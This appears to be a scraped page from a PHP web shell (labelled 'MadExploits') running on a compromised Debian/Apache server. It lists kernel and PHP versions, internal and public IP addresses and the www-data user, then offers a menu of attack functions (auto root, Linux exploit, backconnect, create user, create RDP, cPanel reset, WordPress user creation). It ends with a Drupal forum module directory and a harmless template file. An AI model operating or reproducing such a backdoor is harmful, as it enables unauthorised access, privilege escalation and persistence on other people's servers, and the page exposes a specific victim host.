Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.145.58.141
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
forum /
[ HOME SHELL ]
Name
Size
Permission
Action
forum-icon.tpl.php
691
B
-rw-r--r--
forum-list.tpl.php
3.26
KB
-rw-r--r--
forum-rtl.css
398
B
-rw-r--r--
forum-submitted.tpl.php
711
B
-rw-r--r--
forum-topic-list.tpl.php
2.44
KB
-rw-r--r--
forum.admin.inc
11.72
KB
-rw-r--r--
forum.css
1.03
KB
-rw-r--r--
forum.info
364
B
-rw-r--r--
forum.install
13.27
KB
-rw-r--r--
forum.module
47.75
KB
-rw-r--r--
forum.pages.inc
1.01
KB
-rw-r--r--
forum.test
24.98
KB
-rw-r--r--
forums.tpl.php
550
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : forum-icon.tpl.php
<?php /** * @file * Displays an appropriate icon for a forum post. * * Available variables: * - $new_posts: Indicates whether or not the topic contains new posts. * - $icon_class: The icon to display. May be one of 'hot', 'hot-new', 'new', * 'default', 'closed', or 'sticky'. * - $first_new: Indicates whether this is the first topic with new posts. * * @see template_preprocess_forum_icon() * @see theme_forum_icon() * * @ingroup themeable */ ?> <div class="topic-status-<?php print $icon_class ?>" title="<?php print $icon_title ?>"> <?php if ($first_new): ?> <a id="new"></a> <?php endif; ?> <span class="element-invisible"><?php print $icon_title ?></span> </div>
Close